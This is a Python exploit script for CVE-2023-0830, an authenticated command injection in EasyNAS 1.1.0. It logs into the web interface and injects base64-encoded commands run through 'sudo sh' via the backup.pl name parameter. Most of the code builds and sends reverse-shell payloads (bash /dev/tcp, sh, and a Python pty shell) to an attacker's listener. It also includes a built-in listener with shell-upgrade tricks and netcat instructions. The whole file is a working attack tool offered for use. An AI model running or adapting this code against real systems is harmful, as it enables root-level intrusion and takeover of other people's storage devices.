#!/usr/bin/env python3
import requests
import argparse
import sys
import base64
import urllib.parse
import time
import re
import socket
import threading
import select
import termios
import tty
import os
import random
import string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
verbose = False
def log_info(message):
print(f"[i] {message}")
def log_success(message):
print(f"[+] {message}")
def log_error(message):
print(f"[-] {message}")
def log_verbose(message):
if verbose:
print(f"[v] {message}")
def login(url, username, password, protocol="https", skip_verify=True):
"""Login to the EasyNAS web interface"""
try:
log_info(f"Attempting to login as {username} at {protocol}://{url}...")
# Create a session
session = requests.Session()
# Disable SSL verification if requested
session.verify = not skip_verify
# Send the login request
login_url = f"{protocol}://{url}/easynas/login.pl"
# These are the actual field names in the EasyNAS login form
login_data = {
'usr': username,
'pwd': password,
'action': 'login'
}
headers = {
'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'
}
# Try HTTPS first
try:
response = session.post(login_url, data=login_data, headers=headers, timeout=5)
# Check for login failure indications
if 'Login to EasyNAS' in response.text:
log_error("Login failed: Invalid credentials or server error")
return None
# A less strict check for success - if we don't see the login page again
log_success("Login successful")
return session
except requests.exceptions.SSLError:
# If HTTPS fails with SSL error and protocol is https, try HTTP
if protocol == "https":
log_info("SSL error, trying HTTP instead...")
return login(url, username, password, "http", skip_verify)
except requests.exceptions.ConnectionError:
# If HTTPS connection fails and protocol is https, try HTTP
if protocol == "https":
log_info("Connection error, trying HTTP instead...")
return login(url, username, password, "http", skip_verify)
except Exception as e:
log_error(f"Login failed: {str(e)}")
return None
except Exception as e:
log_error(f"Login failed: {str(e)}")
return None
def execute_command(session, url, command, protocol="https"):
"""Execute a command on the target using the original technique"""
try:
# Encode the command in base64 - exactly like original exploit
encoded_cmd = base64.b64encode(command.encode()).decode()
# Construct the exploit URL - EXACTLY as in the original exploit
exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cmd}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
log_verbose(f"Sending request to: {exploit_url}")
# Execute the command
response = session.get(
exploit_url,
headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
timeout=10,
verify=False
)
if response.status_code != 200:
return f"Error: HTTP status code {response.status_code}"
# Different patterns to try to extract command output
patterns = [
re.compile(r'backup name is invalid\s*
(.*?)', re.DOTALL), # Main pattern
re.compile(r'backup name is invalid\s*
(.*?)$', re.DOTALL), # Alternative pattern
re.compile(r'backup name is invalid\s*(.*?)', re.DOTALL), # Fallback pattern
re.compile(r'
(.*?)
', re.DOTALL), # Error message pattern
]
# Try all patterns
for pattern in patterns:
match = pattern.search(response.text)
if match:
output = match.group(1).strip()
if output:
return output
# If no output was captured, try a fallback approach using a temporary file
# This creates a two-stage approach
log_verbose("No output captured in response, trying two-stage approach")
# Generate a unique filename
tmp_file = f"/tmp/out_{int(time.time())}_{random.randint(1000, 9999)}.txt"
# Execute the command and redirect output to the temporary file
stage1_cmd = f"{command} > {tmp_file} 2>&1"
encoded_stage1 = base64.b64encode(stage1_cmd.encode()).decode()
# Construct the exploit URL - exactly as in the original exploit
stage1_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_stage1}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
log_verbose(f"Sending stage 1 request to: {stage1_url}")
# Execute the first stage
session.get(
stage1_url,
headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
timeout=10,
verify=False
)
# Now read the temporary file
read_cmd = f"cat {tmp_file}"
encoded_read = base64.b64encode(read_cmd.encode()).decode()
# Construct the exploit URL - exactly as in the original exploit
read_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_read}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
log_verbose(f"Sending read request to: {read_url}")
# Execute the read command
read_response = session.get(
read_url,
headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
timeout=10,
verify=False
)
# Try to extract output
for pattern in patterns:
match = pattern.search(read_response.text)
if match:
output = match.group(1).strip()
if output:
# Clean up the temporary file
cleanup_cmd = f"rm -f {tmp_file}"
encoded_cleanup = base64.b64encode(cleanup_cmd.encode()).decode()
cleanup_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cleanup}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
session.get(cleanup_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, verify=False)
return output
# If we still don't have output, return a generic message
return "Command executed, but no output was captured"
except Exception as e:
return f"Error: {str(e)}"
class IntegratedListener:
def __init__(self, host='0.0.0.0', port=4444):
self.host = host
self.port = port
self.socket = None
self.client = None
self.running = False
self.original_terminal_settings = None
self.shell_upgraded = False
def start(self):
"""Start the listener in a separate thread"""
self.running = True
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.socket.bind((self.host, self.port))
self.socket.listen(1)
log_success(f"Listener started on {self.host}:{self.port}")
log_info("Waiting for incoming connection...")
# Set a timeout so we can check for stop flag
self.socket.settimeout(1)
while self.running:
try:
self.client, addr = self.socket.accept()
log_success(f"Received connection from {addr[0]}:{addr[1]}")
self.handle_client()
break
except socket.timeout:
continue
except Exception as e:
log_error(f"Error accepting connection: {e}")
break
except Exception as e:
log_error(f"Error starting listener: {e}")
finally:
self.stop()
def stop(self):
"""Stop the listener"""
self.running = False
# Reset terminal settings
self._reset_terminal()
if self.client:
try:
self.client.close()
except:
pass
self.client = None
if self.socket:
try:
self.socket.close()
except:
pass
self.socket = None
def _reset_terminal(self):
"""Reset terminal settings to original state"""
if self.original_terminal_settings:
try:
# First print a newline to ensure we're at the start of a line
sys.stdout.write("\n")
sys.stdout.flush()
# Reset terminal to normal mode
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.original_terminal_settings)
# Additional terminal cleanup
os.system('stty sane')
os.system('reset')
except Exception as e:
if verbose:
print(f"Error resetting terminal: {e}")
def handle_client(self):
"""Handle the client connection with an interactive shell"""
if not self.client:
return
log_success("Shell connection established!")
log_info("Interactive shell session started")
log_info("Type 'exit' or press Ctrl+C to exit")
# Set terminal to raw mode for better interactive experience
try:
# Save current terminal settings
self.original_terminal_settings = termios.tcgetattr(sys.stdin)
# Set terminal to raw mode
tty.setraw(sys.stdin.fileno())
# Basic terminal setup
if hasattr(os, 'system'):
os.system('stty -echo')
except Exception as e:
log_verbose(f"Error setting terminal to raw mode: {e}")
try:
# Send initial commands to fix the terminal
self._fix_remote_terminal()
# Create two threads for sending and receiving data
threading.Thread(target=self._send_data, daemon=True).start()
self._receive_data()
except KeyboardInterrupt:
log_info("\nKeyboard interrupt received, closing connection")
except Exception as e:
log_error(f"\nError in shell session: {e}")
finally:
self.stop()
def _fix_remote_terminal(self):
"""Send commands to fix the remote terminal"""
if not self.client:
return
# Reset terminal and set up a proper environment
time.sleep(0.5)
# Get local terminal size for better experience
try:
# Get terminal size
terminal_size = os.get_terminal_size()
rows = terminal_size.lines
cols = terminal_size.columns
except:
# Default if we can't get the size
rows = 24
cols = 80
# First, send a basic cleanup sequence
try:
# Clear any pending input
self.client.send(b"\n")
time.sleep(0.1)
except:
pass
# Try different approaches to fix the terminal
shell_fix_commands = [
# Try to fix the terminal in various ways
"\r\n",
"TERM=xterm-256color\n",
"export TERM=xterm-256color\n",
f"stty rows {rows} columns {cols}\n",
# Method 1: Use script command
"which script >/dev/null 2>&1 && (script -q /dev/null)\n",
# Method 2: Use python pty
"which python3 >/dev/null 2>&1 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python >/dev/null 2>&1 && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n",
# Reset CTRL-C handling
"stty intr ^C\n",
# Set prompt to something simple and clean
"PS1='\\$ '\n",
"clear\n",
"echo Shell stabilized\n"
]
# Send each command with a small delay
for cmd in shell_fix_commands:
try:
self.client.send(cmd.encode())
time.sleep(0.2)
except:
pass
# Final cleanup
try:
self.client.send(b"clear\n")
except:
pass
time.sleep(0.3) # Wait for commands to take effect
def _send_data(self):
"""Send data from stdin to the client"""
try:
while self.running and self.client:
# Check if there's data to read from stdin
r, _, _ = select.select([sys.stdin], [], [], 0.1)
if r:
data = os.read(sys.stdin.fileno(), 1024)
if not data:
break
self.client.send(data)
except:
pass
def _receive_data(self):
"""Receive data from client and write to stdout"""
try:
buffer = b""
while self.running and self.client:
# Check if there's data to read from the client
r, _, _ = select.select([self.client], [], [], 0.1)
if r:
data = self.client.recv(1024)
if not data:
log_info("\nConnection closed by remote host")
break
# Process data to handle terminal control sequences
buffer += data
# Write data to stdout
os.write(sys.stdout.fileno(), data)
# Look for error messages and handle them
if b"cannot set terminal process group" in buffer:
# This is a common error in reverse shells
# Send additional commands to fix terminal issues
time.sleep(0.5)
self.client.send(b"export TERM=xterm\n")
self.client.send(b"stty raw -echo\n")
self.client.send(b"reset\n")
time.sleep(0.5)
# Try to reset with a clean buffer
buffer = b""
# If we detect a shell prompt, try to upgrade it
if (b"$ " in buffer or b"# " in buffer or b"sh-" in buffer) and b"python" not in buffer:
if b"bash" not in buffer and b"pty" not in buffer:
time.sleep(0.3)
# Try to upgrade to a better shell if we haven't already
self.client.send(b"which python3 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n")
time.sleep(0.3)
self.client.send(b"export TERM=xterm\n")
self.client.send(b"stty rows 24 columns 80\n")
self.client.send(b"clear\n")
buffer = b""
except:
pass
def reverse_shell(session, url, listener_ip, listener_port, protocol="https", integrated_listener=False, shell_type="bash"):
"""
Create a reverse shell connection to the specified listener
If integrated_listener is True, will start a listener in the script itself
shell_type can be one of: bash, sh, python
"""
if integrated_listener:
# Check if the listener IP is valid for receiving connections
if listener_ip in ['0.0.0.0', '127.0.0.1', 'localhost']:
log_info("Using local listener - determining external IP")
# Try to determine external IP or use default interface
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
listener_ip = s.getsockname()[0]
s.close()
log_success(f"Using {listener_ip} as listener address")
except:
log_error("Could not determine external IP")
log_info("Please specify your actual IP address with --lhost")
return False
# Start the integrated listener in a separate thread
listener = IntegratedListener(host='0.0.0.0', port=listener_port)
listener_thread = threading.Thread(target=listener.start)
listener_thread.daemon = True
listener_thread.start()
# Wait a moment for the listener to start
time.sleep(1)
try:
log_info(f"Sending reverse shell to {listener_ip}:{listener_port}...")
# Create the reverse shell payload
if integrated_listener:
# Choose payload based on shell_type
if shell_type == "python":
# Python-based shell with pty support
python_script = f'''
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{listener_ip}",{listener_port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
'''
encoded_script = base64.b64encode(python_script.encode()).decode()
payload = f"python3 -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || python -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || /bin/bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
elif shell_type == "bash":
# Bash reverse shell with some additional settings for better experience
payload = f"bash -c 'exec bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
else: # sh
# Basic sh reverse shell
payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
else:
# Standard shell for normal netcat
payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
# Encode the payload in base64 - exactly like original
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload - exactly like original
payload = urllib.parse.quote(payload)
# Construct the exploit URL - EXACTLY as in the original exploit
# The key part is: echo+{base64_payload}+|+base64+-d+|+sudo+sh+||a+#
exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
log_verbose(f"Sending request to: {exploit_url}")
# Set timeout as in the original exploit
timeout = 3
try:
# Try the main reverse shell payload
log_verbose("Sending reverse shell payload with timeout=" + str(timeout))
session.get(
exploit_url,
headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
timeout=timeout,
verify=False
)
log_error("Request completed without timeout - shell may have failed")
except requests.exceptions.ReadTimeout:
# This is expected as in the original exploit
log_success("Timeout occurred as expected - connection should be established")
if integrated_listener:
# Keep the main thread alive until the listener thread exits
while listener_thread.is_alive():
try:
time.sleep(0.5)
except KeyboardInterrupt:
log_info("\nKeyboard interrupt received, stopping listener")
listener.stop()
break
return True
except requests.exceptions.RequestException as e:
log_success(f"Connection interrupted - check your listener: {e}")
# Give guidance if it doesn't work immediately
if not integrated_listener:
log_info("If you don't receive a connection, try these alternatives:")
log_info("1. Make sure your listener is running: nc -lvnp " + str(listener_port))
log_info("2. Try using HTTP protocol instead of HTTPS with --protocol http")
log_info("3. Ensure there are no firewalls blocking the connection")
return True
except Exception as e:
log_error(f"Error setting up reverse shell: {str(e)}")
return False
def main():
global verbose
print(r"""
EasyNAS 1.1.0 Authenticated Command Injection - CVE-2023-0830
Created by Ivan Spiridonov (xbz0n)
https://xbz0n.sh
""")
parser = argparse.ArgumentParser(description='EasyNAS 1.1.0 Authenticated Command Injection Exploit')
parser.add_argument('url', help='Target URL with or without protocol (e.g., example.com:8080)')
parser.add_argument('username', help='EasyNAS username')
parser.add_argument('password', help='EasyNAS password')
parser.add_argument('--mode', choices=['shell', 'reverse'], default='shell',
help='Exploitation mode: shell (integrated reverse shell) or reverse (external listener) (default: shell)')
parser.add_argument('--lhost', help='IP address for the reverse shell listener (your IP, auto-detected by default)')
parser.add_argument('--lport', type=int, default=4444, help='Port for the reverse shell listener (default: 4444)')
parser.add_argument('--protocol', choices=['http', 'https'], default='https',
help='Protocol to use (default: https)')
parser.add_argument('--verbose', action='store_true', help='Enable verbose output')
parser.add_argument('--shell', choices=['bash', 'sh', 'python'], default='bash',
help='Specify the shell type to use with integrated listener (default: bash)')
args = parser.parse_args()
verbose = args.verbose
target_url = args.url
if target_url.startswith("http://") or target_url.startswith("https://"):
log_verbose(f"Stripping protocol from URL: {target_url}")
target_url = target_url.split("://")[1]
log_verbose(f"Target URL: {target_url}")
log_verbose(f"Using protocol: {args.protocol}")
if args.mode == 'reverse' and (not args.lhost or not args.lport):
log_error("External reverse shell requires both --lhost and --lport")
parser.print_help()
sys.exit(1)
session = login(target_url, args.username, args.password, args.protocol)
if not session:
sys.exit(1)
if args.mode == 'shell':
if not args.lhost:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
args.lhost = s.getsockname()[0]
s.close()
log_success(f"Using {args.lhost} as listener address")
except:
args.lhost = '0.0.0.0'
log_info(f"Starting integrated reverse shell on port {args.lport}")
reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=True, shell_type=args.shell)
elif args.mode == 'reverse':
log_info(f"Sending reverse shell to external listener at {args.lhost}:{args.lport}")
log_info("Make sure you have a listener running with: nc -lvnp " + str(args.lport))
reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=False)
if __name__ == "__main__":
main()